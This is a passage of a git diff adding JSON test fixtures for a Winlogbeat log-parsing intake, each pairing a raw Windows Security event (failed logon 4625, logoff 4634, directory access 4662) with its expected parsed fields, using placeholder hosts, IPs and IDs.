4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4625", + "kind": "event", + "module": "security", + "outcome": "failure", + "provider": "Microsoft-Windows-Security-Auditing", + "reason": "user_not_exist", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:40:34.260000Z", + "action": { + "id": 4625, + "outcome": "failure", + "properties": { + "AuthenticationPackageName": "Kerberos", + "FailureReason": "%%2313", + "IpAddress": "-", + "IpPort": "-", + "KeyLength": "0", + "LmPackageName": "-", + "LogonProcessName": "Channel", + "LogonType": "3", + "ProcessId": "0x338", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "Status": "0xc000006d", + "SubStatus": "0xc0000064", + "SubjectDomainName": "J_DOE", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WORKSTATION$", + "SubjectUserSid": "S-1-2-3", + "TargetUserSid": "S-1-0-0", + "TransmittedServices": "-", + "WorkstationName": "WORKSTATION" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "WORKSTATION", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ], + "mac": [ + "00-00-00-00-00-00-00-00", + "11-11-11-11-11-11", + "A0-B1-C2-D3-E4-F5", + "AA-BB-CC-DD-EE-FF" + ], + "name": "hostname", + "os": { + "build": "14393.7428", + "family": "windows", + "kernel": "10.0.14393.7426 (rs1_release.240926-1524)", + "name": "Windows Server 2016 Datacenter", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\executable.exe", + "name": "executable.exe", + "pid": 824 + }, + "related": { + "hosts": [ + "WORKSTATION", + "hostname" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Channel" + } + }, + "client": { + "name": "WORKSTATION", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "server": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "fe80::1111:2222:3333:4444", + "fe80::1234:5678:90ab:cde", + "fe80::1234:abcd:ef", + "fe80::a0b1:c2d:3e4", + "fe80::aaaa:bbbb:cccc:dddd", + "fe80::abcd:1234:567" + ] + }, + "source": { + "address": "WORKSTATION", + "domain": "WORKSTATION", + "port": 0 + }, + "user": { + "id": "S-1-2-3", + "name": "WORKSTATION$", + "target": { + "id": "S-1-0-0" + } + }, + "winlog": { + "activity_id": "{12345678-abcd-efab-cdef-123456789012}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "WORKSTATION.johndoe.com", + "event_id": "4625", + "keywords": [ + "Audit Failure" + ], + "logon": { + "failure": { + "reason": "Unknown user name or bad password.", + "status": "This is either due to a bad username or authentication information", + "sub_status": "User logon with misspelled or bad user account" + }, + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 824, + "thread": { + "id": 28936 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2552812283", + "task": "Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json new file mode 100644 index 000000000..ddc69e63b --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4634.json @@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:42:47.895000Z", + "action": { + "id": 4634, + "outcome": "success", + "properties": { + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json new file mode 100644 index 000000000..3d80320f5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4662.json @@ -0,0 +1,105 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 